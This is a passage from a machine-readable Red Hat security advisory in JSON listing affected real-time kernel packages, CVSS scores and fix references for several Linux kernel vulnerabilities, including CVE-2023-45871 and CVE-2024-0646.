"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c"
},
{
"cve": "CVE-2023-45871",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2023-10-17T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2244723"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in igb_configure_rx_ring in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel. An overflow of the contents from a packet that is too large will overflow into the kernel\u0027s ring buffer, leading to a system integrity issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: IGB driver inadequate buffer size for frames larger than MTU",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as Important because of its nature of exposure to the threat of impacting Confidentiality, Integrity and Availability by an attacker while being in an adjacent physical layer with no privilege required.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-45871"
},
{
"category": "external",
"summary": "RHBZ#2244723",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2244723"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-45871",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45871"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-45871",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45871"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=bb5ed01cd2428cd25b1c88a3a9cba87055eb289f",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=bb5ed01cd2428cd25b1c88a3a9cba87055eb289f"
}
],
"release_date": "2023-08-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: IGB driver inadequate buffer size for frames larger than MTU"
},
{
"cve": "CVE-2024-0646",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2024-01-17T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2253908"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds memory write flaw was found in the Linux kernel\u2019s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination",
"title": "Vulnerability summary"
},
{
"category": "general",
